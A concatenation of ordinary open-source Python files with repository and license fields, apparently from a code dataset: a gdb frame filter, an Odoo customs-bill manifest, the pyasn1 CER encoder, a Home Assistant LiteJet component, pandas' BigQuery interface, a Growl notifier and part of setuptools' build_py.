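        self.name = "example-pass-through"
        self.enabled = True
        self.priority = 100
        # Registering in the global dictionary makes the filter manageable by
        # the enable/disable/priority commands defined above.
        gdb.frame_filters[self.name] = self
    def filter(self, frame_iter):
        # A real filter would wrap frames in FrameDecorator subclasses or
        # elide some of them; this one passes everything through unchanged.
        return frame_iter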
|
gpl-2.0
|
yvaucher/l10n-italy
|
__unported__/l10n_it_bill_of_entry/__openerp__.py
|
3
|
2507
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013 Agile Business Group sagl (<http://www.agilebg.com>)
# Copyright (C) 2013
# Associazione OpenERP Italia (<http://www.openerp-italia.org>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Italian Localisation - Bill of Entry',
'version': '0.1',
'category': 'Localisation/Italy',
'description': """
Customs bills of entry (bolle doganali)
=======================================
Specifications
--------------
http://wiki.openerp-italia.org/doku.php/area_utente/requisiti/extraue
Three documents are involved:
- Supplier invoice
- Forwarding agent invoice
- Customs bill of entry
Relationships:
N customs bills of entry -> N supplier invoices
1 forwarding agent invoice -> N customs bills of entry
Configuration
-------------
The accounting journal to be used for the closing transfer entry must be
configured.
Usage
-----
From the customs bill of entry, the corresponding supplier invoice(s) can be
linked manually.
From the forwarding agent invoice, the customs bill(s) of entry can be generated
with the 'genera bolla' (generate bill) button. This requires an invoice template
(used for the customs bill of entry) to be configured first.
On the forwarding agent invoice, you must indicate which line(s) represent the
VAT advanced to customs.
When the forwarding agent invoice is confirmed, the transfer journal entry that closes the customs bill of entry is generated.
""",
'author': 'Agile Business Group',
'website': 'http://www.agilebg.com',
'license': 'AGPL-3',
"depends": ['base', 'account_invoice_template'],
"data": [
'account_invoice_view.xml',
'company_view.xml',
],
"demo": [],
'installable': False
}
|
agpl-3.0
|
alfa-jor/addon
|
plugin.video.alfa/lib/sambatools/pyasn1/codec/cer/encoder.py
|
2
|
5130
|
# CER encoder
from pyasn1 import error
from pyasn1.codec.ber import encoder
from pyasn1.compat.octets import int2oct, str2octs, null
from pyasn1.type import univ
from pyasn1.type import useful
class BooleanEncoder(encoder.IntegerEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
if client == 0:
substrate = int2oct(0)
else:
substrate = int2oct(255)
return substrate, 0
class BitStringEncoder(encoder.BitStringEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
return encoder.BitStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class OctetStringEncoder(encoder.OctetStringEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
return encoder.OctetStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class RealEncoder(encoder.RealEncoder):
def _chooseEncBase(self, value):
m, b, e = value
return self._dropFloatingPoint(m, b, e)
# specialized GeneralStringEncoder here
class GeneralizedTimeEncoder(OctetStringEncoder):
zchar = str2octs('Z')
pluschar = str2octs('+')
minuschar = str2octs('-')
zero = str2octs('0')
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
octets = client.asOctets()
# This breaks too many existing data items
# if '.' not in octets:
# raise error.PyAsn1Error('Format must include fraction of second: %r' % octets)
if len(octets) < 15:
raise error.PyAsn1Error('Bad UTC time length: %r' % octets)
if self.pluschar in octets or self.minuschar in octets:
raise error.PyAsn1Error('Must be UTC time: %r' % octets)
if octets[-1] != self.zchar[0]:
raise error.PyAsn1Error('Missing timezone specifier: %r' % octets)
return encoder.OctetStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class UTCTimeEncoder(encoder.OctetStringEncoder):
zchar = str2octs('Z')
pluschar = str2octs('+')
minuschar = str2octs('-')
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
octets = client.asOctets()
if self.pluschar in octets or self.minuschar in octets:
raise error.PyAsn1Error('Must be UTC time: %r' % octets)
if octets and octets[-1] != self.zchar[0]:
client = client.clone(octets + self.zchar)
if len(client) != 13:
raise error.PyAsn1Error('Bad UTC time length: %r' % client)
return encoder.OctetStringEncoder.encodeValue(
self, encodeFun, client, defMode, 1000
)
class SetOfEncoder(encoder.SequenceOfEncoder):
def encodeValue(self, encodeFun, client, defMode, maxChunkSize):
if isinstance(client, univ.SequenceAndSetBase):
client.setDefaultComponents()
client.verifySizeSpec()
substrate = null
idx = len(client)
# This is certainly a hack but how else do I distinguish SetOf
# from Set if they have the same tags&constraints?
if isinstance(client, univ.SequenceAndSetBase):
# Set
comps = []
while idx > 0:
idx = idx - 1
if client[idx] is None: # Optional component
continue
if client.getDefaultComponentByPosition(idx) == client[idx]:
continue
comps.append(client[idx])
comps.sort(key=lambda x: isinstance(x, univ.Choice) and \
x.getMinTagSet() or x.getTagSet())
for c in comps:
substrate += encodeFun(c, defMode, maxChunkSize)
else:
# SetOf
compSubs = []
while idx > 0:
idx = idx - 1
compSubs.append(
encodeFun(client[idx], defMode, maxChunkSize)
)
compSubs.sort() # perhaps padding's not needed
substrate = null
for compSub in compSubs:
substrate += compSub
return substrate, 1
tagMap = encoder.tagMap.copy()
tagMap.update({
univ.Boolean.tagSet: BooleanEncoder(),
univ.BitString.tagSet: BitStringEncoder(),
univ.OctetString.tagSet: OctetStringEncoder(),
univ.Real.tagSet: RealEncoder(),
useful.GeneralizedTime.tagSet: GeneralizedTimeEncoder(),
useful.UTCTime.tagSet: UTCTimeEncoder(),
univ.SetOf().tagSet: SetOfEncoder() # conflicts with Set
})
typeMap = encoder.typeMap.copy()
typeMap.update({
univ.Set.typeId: SetOfEncoder(),
univ.SetOf.typeId: SetOfEncoder()
})
class Encoder(encoder.Encoder):
def __call__(self, client, defMode=False, maxChunkSize=0):
return encoder.Encoder.__call__(self, client, defMode, maxChunkSize)
encode = Encoder(tagMap, typeMap)
# EncoderFactory queries class instance and builds a map of tags -> encoders
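# Hypothetical usage sketch (not part of pyasn1): how the module-level `encode`
# callable defined above is typically invoked. Wrapped in a function so that
# nothing runs at import time.
def _example_encode_boolean():
    # CER represents a true BOOLEAN with a single 0xFF content octet.
    return encode(univ.Boolean(True))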
|
gpl-3.0
|
kyvinh/home-assistant
|
homeassistant/components/litejet.py
|
22
|
1594
|
"""Allows the LiteJet lighting system to be controlled by Home Assistant.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/litejet/
"""
import logging
import voluptuous as vol
from homeassistant.helpers import discovery
from homeassistant.const import CONF_PORT
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pylitejet==0.1']
_LOGGER = logging.getLogger(__name__)
CONF_EXCLUDE_NAMES = 'exclude_names'
CONF_INCLUDE_SWITCHES = 'include_switches'
DOMAIN = 'litejet'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_PORT): cv.string,
vol.Optional(CONF_EXCLUDE_NAMES): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_INCLUDE_SWITCHES, default=False): cv.boolean
})
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Initialize the LiteJet component."""
from pylitejet import LiteJet
url = config[DOMAIN].get(CONF_PORT)
hass.data['litejet_system'] = LiteJet(url)
hass.data['litejet_config'] = config[DOMAIN]
discovery.load_platform(hass, 'light', DOMAIN, {}, config)
if config[DOMAIN].get(CONF_INCLUDE_SWITCHES):
discovery.load_platform(hass, 'switch', DOMAIN, {}, config)
discovery.load_platform(hass, 'scene', DOMAIN, {}, config)
return True
def is_ignored(hass, name):
"""Determine if a load, switch, or scene should be ignored."""
for prefix in hass.data['litejet_config'].get(CONF_EXCLUDE_NAMES, []):
if name.startswith(prefix):
return True
return False
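# Hypothetical configuration sketch (not part of Home Assistant): the shape of
# configuration this component expects, expressed as the dict that the
# CONFIG_SCHEMA above validates. The serial port path and names are made-up
# example values; wrapped in a function so nothing runs at import time.
def _example_validated_config():
    return CONFIG_SCHEMA({
        DOMAIN: {
            CONF_PORT: '/dev/serial/by-id/usb-litejet-example',
            CONF_EXCLUDE_NAMES: ['Unused '],
            CONF_INCLUDE_SWITCHES: True,
        }
    })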
|
apache-2.0
|
alephu5/Soundbyte
|
environment/lib/python3.3/site-packages/pandas/io/gbq.py
|
1
|
18985
|
"""
Pandas module to interface with Google BigQuery.
"""
import os
import sys
import tempfile
import csv
import logging
from datetime import datetime
import pkg_resources
from distutils.version import LooseVersion
import pandas as pd
import numpy as np
from pandas.core.common import PandasError
from pandas.core.frame import DataFrame
from pandas.tools.merge import concat
try:
import bq
import bigquery_client
import gflags as flags
_BQ_INSTALLED = True
_BQ_VERSION = pkg_resources.get_distribution('bigquery').version
if LooseVersion(_BQ_VERSION) >= '2.0.17':
_BQ_VALID_VERSION = True
else:
_BQ_VALID_VERSION = False
except ImportError:
_BQ_INSTALLED = False
# Setup the logger
logger = logging.getLogger('pandas.io.gbq')
# These are some custom exceptions that the
# to_gbq() method can throw
class SchemaMissing(PandasError, IOError):
"""
Raised when attempting to write a DataFrame to
a new table in Google BigQuery without specifying
a schema describing the DataFrame.
"""
pass
class InvalidSchema(PandasError, IOError):
"""
Raised when attempting to write a DataFrame to
Google BigQuery with an invalid table schema.
"""
pass
class TableExistsFail(PandasError, IOError):
"""
Raised when attempting to write a DataFrame to
an existing Google BigQuery table without specifying
that a replace/update action be taken.
"""
pass
class InvalidColumnOrder(PandasError, IOError):
"""
Raised when the provided column order for output
results DataFrame does not match the schema
returned by BigQuery.
"""
pass
def _authenticate():
"""
For testing, we abstract the authentication to BigQuery API.
Presently this is implemented using the bq.py Client.Get()
method. Any exceptions raised are considered fatal, so we
do not process them.
Returns
-------
BigqueryClient : Configured connection to Google BigQuery
"""
return bq.Client.Get()
def _parse_entry(field_value, field_type):
"""
Given a value and the corresponding BigQuery data type,
perform any operations needed and return in a format
appropriate for a numpy record dictionary
Parameters
----------
field_value : Source object to be transformed
field_type : String representation of Google BigQuery
data type (per schema)
Returns
-------
field_value : object or primitive of type corresponding
to field_type
"""
# Avoid any casting problems
if field_value is None or field_value == 'null':
return None
if field_type == 'INTEGER' or field_type == 'FLOAT':
field_value = float(field_value)
elif field_type == 'TIMESTAMP':
timestamp = datetime.utcfromtimestamp(float(field_value))
field_value = np.datetime64(timestamp)
elif field_type == 'BOOLEAN':
field_value = field_value == 'true'
# Note that results are unicode, so this will
# fail for non-ASCII characters.. this probably
# functions differently in Python 3
else:
field_value = str(field_value)
return field_value
def _parse_page(raw_page, col_names, col_types, col_dtypes):
"""
Given a list of rows produced by the client.apiclient.tabledata().list(),
build a numpy array with proper dtypes and column names as specified
by the arguments.
Parameters
----------
raw_page : Resulting list of rows from a page retrieved via
bigquery API
client.apiclient.tabledata().list().execute()['rows']
col_names: An ordered list of names for the columns
col_types: String representation of the BigQuery DataType for that
column
col_dtypes: Target numpy.dtype for the column
Returns
-------
page_array : numpy record array corresponding
to the page data
"""
# Should be at most 100,000 per the API, but this could
# be increased in the future. Should only be less than
# this for the last page to reduce API calls
page_row_count = len(raw_page)
# Place to hold the results for a page of data
page_array = np.zeros((page_row_count,), dtype=zip(col_names, col_dtypes))
for row_num, raw_row in enumerate(raw_page):
entries = raw_row.get('f', [])
# Iterate over each entry - setting proper field types
for col_num, field_type in enumerate(col_types):
# Process the field's types using schema
field_value = _parse_entry(entries[col_num].get('v', ''),
field_type)
# Fill the value into the final array
page_array[row_num][col_num] = field_value
return page_array
def _parse_data(client, job, index_col=None, col_order=None):
"""
Iterate through the query results and piece together the
final DataFrame. Builds a DataFrame for each page of
results, then concatenates them together when finished.
To save memory, we use numpy record arrays to build these
DataFrames.
Parameters
----------
client: An instance of bq.Client
job: An array containing the job info for a completed query
index_col: str (optional)
Name of result column to use for index in results DataFrame
col_order: list() (optional)
List of BigQuery column names in the desired order for results
DataFrame
Returns
-------
df: pandas DataFrame
DataFrame representing results of query
Raises:
------
InvalidColumnOrder:
Raised if 'col_order' parameter doesn't match returned DataFrame
BigqueryError:
Raised by bigquery_client if a Google API error is encountered
Notes:
-----
This script relies on Google being consistent with their
pagination API. We are using the most flexible iteration method
that we could find in the bq.py/bigquery_client.py APIs, but
these have undergone large amounts of change recently.
"""
# dtype Map -
# see: http://pandas.pydata.org/pandas-docs/dev/missing_data.html#missing-data-casting-rules-and-indexing
dtype_map = {'INTEGER': np.dtype(float),
'FLOAT': np.dtype(float),
'TIMESTAMP': 'M8[ns]'} # This seems to be buggy without
# nanosecond indicator
# We first need the schema to get information about the columns of
# our dataframe.
table_dict = job['configuration']['query']['destinationTable']
fields = client.GetTableSchema(table_dict)['fields']
# Get the schema into a format useable to create our
# dataframe
col_dtypes = []
col_types = []
col_names = []
# TODO: Do this in one clean step
for field in fields:
col_types.append(field['type'])
# Note the encoding... numpy doesn't like titles that are UTF8, which
# is the return type from the API
col_names.append(field['name'].encode('ascii', 'ignore'))
# Note, it would be nice to use 'str' types, but BigQuery doesn't have
# a fixed length in mind - just maxes out at 64k
col_dtypes.append(dtype_map.get(field['type'], object))
# How many columns are there
num_columns = len(col_names)
# Iterate over the result rows.
# Since Google's API now requires pagination of results,
# we do that here. The following is repurposed from
# bigquery_client.py :: Client._JobTableReader._ReadOnePage
# TODO: Enable Reading From Table,
# see Client._TableTableReader._ReadOnePage
# Initially, no page token is set
page_token = None
# This number is the current max results per page
max_rows = bigquery_client._MAX_ROWS_PER_REQUEST
# How many rows in result set? Initialize to max_rows
total_rows = max_rows
# This is the starting row for a particular page...
# is ignored if page_token is present, though
# it may be useful if we wish to implement SQL like LIMITs
# with minimums
start_row = 0
# Keep our page DataFrames until the end when we concatenate them
dataframe_list = list()
current_job = job['jobReference']
# Iterate over all rows
while start_row < total_rows:
# Setup the parameters for getQueryResults() API Call
kwds = dict(current_job)
kwds['maxResults'] = max_rows
# Sets the timeout to 0 because we assume the table is already ready.
# This is because our previous call to Query() is synchronous
# and will block until it's actually done
kwds['timeoutMs'] = 0
# Use start row if there's no page_token ... in other words, the
# user requested to start somewhere other than the beginning...
# presently this is not a parameter to read_gbq(), but it will be
# added eventually.
if page_token:
kwds['pageToken'] = page_token
else:
kwds['startIndex'] = start_row
data = client.apiclient.jobs().getQueryResults(**kwds).execute()
if not data['jobComplete']:
raise bigquery_client.BigqueryError('Job was not completed, or was invalid')
# How many rows are there across all pages?
# Note: This is presently the only reason we don't just use
# _ReadOnePage() directly
total_rows = int(data['totalRows'])
page_token = data.get('pageToken', None)
raw_page = data.get('rows', [])
page_array = _parse_page(raw_page, col_names, col_types, col_dtypes)
start_row += len(raw_page)
if total_rows > 0:
completed = (100 * start_row) / total_rows
logger.info('Remaining Rows: ' + str(total_rows - start_row) + '('
+ str(completed) + '% Complete)')
else:
logger.info('No Rows')
dataframe_list.append(DataFrame(page_array))
# Did we get enough rows? Note: gbq.py stopped checking for this
# but we felt it was still a good idea.
if not page_token and not raw_page and start_row != total_rows:
raise bigquery_client.BigqueryInterfaceError(
'Not enough rows returned by server. Expected: {0} Rows, But '
'Received {1}'.format(total_rows, start_row)
)
# Build final dataframe
final_df = concat(dataframe_list, ignore_index=True)
# Reindex the DataFrame on the provided column
if index_col is not None:
if index_col in col_names:
final_df.set_index(index_col, inplace=True)
col_names.remove(index_col)
else:
raise InvalidColumnOrder(
'Index column "{0}" does not exist in DataFrame.'
.format(index_col)
)
# Change the order of columns in the DataFrame based on provided list
if col_order is not None:
if sorted(col_order) == sorted(col_names):
final_df = final_df[col_order]
else:
raise InvalidColumnOrder(
'Column order does not match this DataFrame.'
)
# Downcast floats to integers and objects to booleans
# if there are no NaN's. This is presently due to a
# limitation of numpy in handling missing data.
final_df._data = final_df._data.downcast(dtypes='infer')
return final_df
def to_gbq(dataframe, destination_table, schema=None, col_order=None,
if_exists='fail', **kwargs):
"""Write a DataFrame to a Google BigQuery table.
THIS IS AN EXPERIMENTAL LIBRARY
If the table exists, the DataFrame will be appended. If not, a new table
will be created, in which case the schema will have to be specified. By
default, rows will be written in the order they appear in the DataFrame,
though the user may specify an alternative order.
Parameters
----------
dataframe : DataFrame
DataFrame to be written
destination_table : string
name of table to be written, in the form 'dataset.tablename'
schema : sequence (optional)
list of column types in order for data to be inserted,
e.g. ['INTEGER', 'TIMESTAMP', 'BOOLEAN']
col_order : sequence (optional)
order which columns are to be inserted,
e.g. ['primary_key', 'birthday', 'username']
if_exists : {'fail', 'replace', 'append'} (optional)
- fail: If table exists, raise TableExistsFail.
- replace: If table exists, drop it, recreate it, and insert data.
- append: If table exists, insert data. Create if does not exist.
kwargs are passed to the Client constructor
Raises
------
SchemaMissing :
Raised if the 'if_exists' parameter is set to 'replace', but no schema
is specified
TableExistsFail :
Raised if the specified 'destination_table' exists but the 'if_exists'
parameter is set to 'fail' (the default)
InvalidSchema :
Raised if the 'schema' parameter does not match the provided DataFrame
"""
if not _BQ_INSTALLED:
if sys.version_info >= (3, 0):
raise NotImplementedError('gbq module does not support Python 3 '
'yet')
else:
raise ImportError('Could not import Google BigQuery Client.')
if not _BQ_VALID_VERSION:
raise ImportError("pandas requires bigquery >= 2.0.17 for Google "
"BigQuery support, current version " + _BQ_VERSION)
ALLOWED_TYPES = ['STRING', 'INTEGER', 'FLOAT', 'BOOLEAN', 'TIMESTAMP',
'RECORD']
if if_exists == 'replace' and schema is None:
raise SchemaMissing('Cannot replace a table without specifying the '
'data schema')
else:
client = _authenticate()
table_reference = client.GetTableReference(destination_table)
if client.TableExists(table_reference):
if if_exists == 'fail':
raise TableExistsFail('Cannot overwrite existing tables if '
'\'if_exists="fail"\'')
else:
# Build up a string representation of the
# table's schema. Since the table already
# exists, we ask the API for it, which
# is returned in a list of dictionaries
# describing column data. Iterate over these
# and build up a string of form:
# "col_name1 : col_type1, col_name2 : col_type2..."
schema_full = client.GetTableSchema(
dict(table_reference)
)['fields']
schema = ''
for count, row in enumerate(schema_full):
if count > 0:
schema += ', '
schema += row['name'] + ':' + row['type']
else:
logger.info('Creating New Table')
if schema is None:
raise SchemaMissing('Cannot create a new table without '
'specifying the data schema')
else:
columns = dataframe.columns
if len(schema) != len(columns):
raise InvalidSchema('Incorrect number of columns in '
'schema')
else:
schema_string = ''
for count, name in enumerate(columns):
if count > 0:
schema_string += ', '
column_type = schema[count].upper()
if column_type in ALLOWED_TYPES:
schema_string += name + ':' + schema[count].lower()
else:
raise InvalidSchema('Invalid Type: ' + column_type
+ ". Must be one of: " +
str(ALLOWED_TYPES))
schema = schema_string
opts = kwargs
opts['sync'] = True
opts['skip_leading_rows'] = 1
opts['encoding'] = 'UTF-8'
opts['max_bad_records'] = 0
# See: https://developers.google.com/bigquery/docs/reference/v2/jobs
if if_exists == 'replace':
opts['write_disposition'] = 'WRITE_TRUNCATE'
elif if_exists == 'append':
opts['write_disposition'] = 'WRITE_APPEND'
with tempfile.NamedTemporaryFile() as csv_file:
dataframe.to_csv(csv_file.name, index=False, encoding='utf-8')
job = client.Load(table_reference, csv_file.name, schema=schema,
**opts)
def read_gbq(query, project_id=None, destination_table=None, index_col=None,
col_order=None, **kwargs):
"""Load data from Google BigQuery.
THIS IS AN EXPERIMENTAL LIBRARY
The main method a user calls to load data from Google BigQuery into a
pandas DataFrame. This is a simple wrapper for Google's bq.py and
bigquery_client.py, which we use to get the source data. Because of this,
this script respects the user's bq settings file, '~/.bigqueryrc', if it
exists. Such a file can be generated using 'bq init'. Further, additional
parameters for the query can be specified as either ``**kwds`` in the
command, or using FLAGS provided in the 'gflags' module. Particular options
can be found in bigquery_client.py.
Parameters
----------
query : str
SQL-Like Query to return data values
project_id : str (optional)
Google BigQuery Account project ID. Optional, since it may be
located in ~/.bigqueryrc
index_col : str (optional)
Name of result column to use for index in results DataFrame
col_order : list(str) (optional)
List of BigQuery column names in the desired order for results
DataFrame
destination_table : string (optional)
If provided, send the results to the given table.
**kwargs :
To be passed to bq.Client.Create(). Particularly: 'trace',
'sync', 'api', 'api_version'
Returns
-------
df: DataFrame
DataFrame representing results of query
"""
if not _BQ_INSTALLED:
if sys.version_info >= (3, 0):
raise NotImplementedError('gbq module does not support Python 3 '
'yet')
else:
raise ImportError('Could not import Google BigQuery Client.')
if not _BQ_VALID_VERSION:
raise ImportError('pandas requires bigquery >= 2.0.17 for Google '
'BigQuery support, current version ' + _BQ_VERSION)
query_args = kwargs
query_args['project_id'] = project_id
query_args['query'] = query
query_args['destination_table'] = destination_table
query_args['sync'] = True
client = _authenticate()
job = client.Query(**query_args)
return _parse_data(client, job, index_col=index_col, col_order=col_order)
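# Hypothetical usage sketch (not part of pandas): how read_gbq() and to_gbq()
# above are meant to be called. The project ID and destination table are
# made-up placeholders; the query uses the public 'shakespeare' sample table.
# Wrapped in a function so nothing runs at import time.
def _example_round_trip():
    df = read_gbq('SELECT word, word_count FROM publicdata:samples.shakespeare LIMIT 10',
                  project_id='my-project-id')
    to_gbq(df, 'my_dataset.word_counts',
           schema=['STRING', 'INTEGER'], if_exists='append')
    return df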
|
gpl-3.0
|
cyberden/CouchPotatoServer
|
libs/gntp/notifier.py
|
122
|
8299
|
# Copyright: 2013 Paul Traylor
# These sources are released under the terms of the MIT license: see LICENSE
"""
The gntp.notifier module is provided as a simple way to send notifications
using GNTP
.. note::
This class is intended to mostly mirror the older Python bindings such
that you should be able to replace instances of the old bindings with
this class.
`Original Python bindings <http://code.google.com/p/growl/source/browse/Bindings/python/Growl.py>`_
"""
import logging
import platform
import socket
import sys
from gntp.version import __version__
import gntp.core
import gntp.errors as errors
import gntp.shim
__all__ = [
'mini',
'GrowlNotifier',
]
logger = logging.getLogger(__name__)
class GrowlNotifier(object):
"""Helper class to simplfy sending Growl messages
:param string applicationName: Sending application name
:param list notifications: List of valid notifications
:param list defaultNotifications: List of notifications that should be enabled
by default
:param string applicationIcon: Icon URL
:param string hostname: Remote host
:param integer port: Remote port
"""
passwordHash = 'MD5'
socketTimeout = 3
def __init__(self, applicationName='Python GNTP', notifications=[],
defaultNotifications=None, applicationIcon=None, hostname='localhost',
password=None, port=23053):
self.applicationName = applicationName
self.notifications = list(notifications)
if defaultNotifications:
self.defaultNotifications = list(defaultNotifications)
else:
self.defaultNotifications = self.notifications
self.applicationIcon = applicationIcon
self.password = password
self.hostname = hostname
self.port = int(port)
def _checkIcon(self, data):
'''
Check the icon to see if it's valid
If it's a simple URL icon, then we return True. If it's a data icon
then we return False
'''
logger.info('Checking icon')
return gntp.shim.u(data).startswith('http')
def register(self):
"""Send GNTP Registration
.. warning::
Before sending notifications to Growl, you need to have
sent a registration message at least once
"""
logger.info('Sending registration to %s:%s', self.hostname, self.port)
register = gntp.core.GNTPRegister()
register.add_header('Application-Name', self.applicationName)
for notification in self.notifications:
enabled = notification in self.defaultNotifications
register.add_notification(notification, enabled)
if self.applicationIcon:
if self._checkIcon(self.applicationIcon):
register.add_header('Application-Icon', self.applicationIcon)
else:
resource = register.add_resource(self.applicationIcon)
register.add_header('Application-Icon', resource)
if self.password:
register.set_password(self.password, self.passwordHash)
self.add_origin_info(register)
self.register_hook(register)
return self._send('register', register)
def notify(self, noteType, title, description, icon=None, sticky=False,
priority=None, callback=None, identifier=None, custom={}):
"""Send a GNTP notifications
.. warning::
Must have registered with growl beforehand or messages will be ignored
:param string noteType: One of the notification names registered earlier
:param string title: Notification title (usually displayed on the notification)
:param string description: The main content of the notification
:param string icon: Icon URL path
:param boolean sticky: Sticky notification
:param integer priority: Message priority level from -2 to 2
:param string callback: URL callback
:param dict custom: Custom attributes. Key names should be prefixed with X-
according to the spec but this is not enforced by this class
.. warning::
For now, only URL callbacks are supported. In the future, the
callback argument will also support a function
"""
logger.info('Sending notification [%s] to %s:%s', noteType, self.hostname, self.port)
assert noteType in self.notifications
notice = gntp.core.GNTPNotice()
notice.add_header('Application-Name', self.applicationName)
notice.add_header('Notification-Name', noteType)
notice.add_header('Notification-Title', title)
if self.password:
notice.set_password(self.password, self.passwordHash)
if sticky:
notice.add_header('Notification-Sticky', sticky)
if priority:
notice.add_header('Notification-Priority', priority)
if icon:
if self._checkIcon(icon):
notice.add_header('Notification-Icon', icon)
else:
resource = notice.add_resource(icon)
notice.add_header('Notification-Icon', resource)
if description:
notice.add_header('Notification-Text', description)
if callback:
notice.add_header('Notification-Callback-Target', callback)
if identifier:
notice.add_header('Notification-Coalescing-ID', identifier)
for key in custom:
notice.add_header(key, custom[key])
self.add_origin_info(notice)
self.notify_hook(notice)
return self._send('notify', notice)
def subscribe(self, id, name, port):
"""Send a Subscribe request to a remote machine"""
sub = gntp.core.GNTPSubscribe()
sub.add_header('Subscriber-ID', id)
sub.add_header('Subscriber-Name', name)
sub.add_header('Subscriber-Port', port)
if self.password:
sub.set_password(self.password, self.passwordHash)
self.add_origin_info(sub)
self.subscribe_hook(sub)
return self._send('subscribe', sub)
def add_origin_info(self, packet):
"""Add optional Origin headers to message"""
packet.add_header('Origin-Machine-Name', platform.node())
packet.add_header('Origin-Software-Name', 'gntp.py')
packet.add_header('Origin-Software-Version', __version__)
packet.add_header('Origin-Platform-Name', platform.system())
packet.add_header('Origin-Platform-Version', platform.platform())
def register_hook(self, packet):
pass
def notify_hook(self, packet):
pass
def subscribe_hook(self, packet):
pass
def _send(self, messagetype, packet):
"""Send the GNTP Packet"""
packet.validate()
data = packet.encode()
logger.debug('To : %s:%s <%s>\n%s', self.hostname, self.port, packet.__class__, data)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.socketTimeout)
try:
s.connect((self.hostname, self.port))
s.send(data)
recv_data = s.recv(1024)
while not recv_data.endswith(gntp.shim.b("\r\n\r\n")):
recv_data += s.recv(1024)
except socket.error:
# Python2.5 and Python3 compatible exception
exc = sys.exc_info()[1]
raise errors.NetworkError(exc)
response = gntp.core.parse_gntp(recv_data)
s.close()
logger.debug('From : %s:%s <%s>\n%s', self.hostname, self.port, response.__class__, response)
if type(response) == gntp.core.GNTPOK:
return True
logger.error('Invalid response: %s', response.error())
return response.error()
def mini(description, applicationName='PythonMini', noteType="Message",
title="Mini Message", applicationIcon=None, hostname='localhost',
password=None, port=23053, sticky=False, priority=None,
callback=None, notificationIcon=None, identifier=None,
notifierFactory=GrowlNotifier):
"""Single notification function
Simple notification function in one line. Has only one required parameter
and attempts to use reasonable defaults for everything else
:param string description: Notification message
.. warning::
For now, only URL callbacks are supported. In the future, the
callback argument will also support a function
"""
try:
growl = notifierFactory(
applicationName=applicationName,
notifications=[noteType],
defaultNotifications=[noteType],
applicationIcon=applicationIcon,
hostname=hostname,
password=password,
port=port,
)
result = growl.register()
if result is not True:
return result
return growl.notify(
noteType=noteType,
title=title,
description=description,
icon=notificationIcon,
sticky=sticky,
priority=priority,
callback=callback,
identifier=identifier,
)
except Exception:
# We want the "mini" function to be simple and swallow Exceptions
# in order to be less invasive
logger.exception("Growl error")
if __name__ == '__main__':
# If we're running this module directly we're likely running it as a test
# so extra debugging is useful
logging.basicConfig(level=logging.INFO)
mini('Testing mini notification')
|
gpl-3.0
|
VigTech/Vigtech-Services
|
env/lib/python2.7/site-packages/setuptools/command/build_py.py
|
301
|
7915
|
from glob import glob
from distutils.util import convert_path
import distutils.command.build_py as orig
import os
import sys
import fnmatch
import textwrap
try:
from setuptools.lib2to3_ex import Mixin2to3
except ImportError:
class Mixin2to3:
def run_2to3(self, files, doctests=True):
"do nothing"
class build_py(orig.build_py, Mixin2to3):
"""Enhanced 'build_py' command that includes data files with packages
The data files are specified via a 'package_data' argument to 'setup()'.
See 'setuptools.dist.Distribution' for more details.
Also, this version of the 'build_py' command allows you to specify both
'py_modules' and 'packages' in the same setup operation.
"""
def finalize_options(self):
orig.build_py.finalize_options(self)
self.package_data = self.distribution.package_data
self.exclude_package_data = (self.distribution.exclude_package_data or
{})
if 'data_files' in self.__dict__:
del self.__dict__['data_files']
self.__updated_files = []
self.__doctests_2to3 = []
def run(self):
"""Build modules, packages, and copy data files to build directory"""
if not self.py_modules and not self.packages:
return
if self.py_modules:
self.build_modules()
if self.packages:
self.build_packages()
self.build_package_data()
self.run_2to3(self.__updated_files, False)
self.run_2to3(self.__updated_files, True)
self.run_2to3(self.__doctests_2to3, True)
# Only compile actual .py files, using our base class' idea of what our
# output files are.
self.byte_compile(orig.build_py.get_outputs(self, include_bytecode=0))
def __getattr__(self, attr):
if attr == 'data_files': # lazily compute data files
self.data_files = files = self._get_data_files()
return files
return orig.build_py.__getattr__(self, attr)
def build_module(self, module, module_file, package):
outfile, copied = orig.build_py.build_module(self, module, module_file,
package)
if copied:
self.__updated_files.append(outfile)
return outfile, copied
def _get_data_files(self):
"""Generate list of '(package,src_dir,build_dir,filenames)' tuples"""
self.analyze_manifest()
data = []
for package in self.packages or ():
# Locate package source directory
src_dir = self.get_package_dir(package)
# Compute package build directory
build_dir = os.path.join(*([self.build_lib] + package.split('.')))
# Length of path to strip from found files
plen = len(src_dir) + 1
# Strip directory from globbed filenames
filenames = [
file[plen:] for file in self.find_data_files(package, src_dir)
]
data.append((package, src_dir, build_dir, filenames))
return data
def find_data_files(self, package, src_dir):
"""Return filenames for package's data files in 'src_dir'"""
globs = (self.package_data.get('', [])
+ self.package_data.get(package, []))
files = self.manifest_files.get(package, [])[:]
for pattern in globs:
# Each pattern has to be converted to a platform-specific path
files.extend(glob(os.path.join(src_dir, convert_path(pattern))))
return self.exclude_data_files(package, src_dir, files)
def build_package_data(self):
"""Copy data files into build directory"""
for package, src_dir, build_dir, filenames in self.data_files:
for filename in filenames:
target = os.path.join(build_dir, filename)
self.mkpath(os.path.dirname(target))
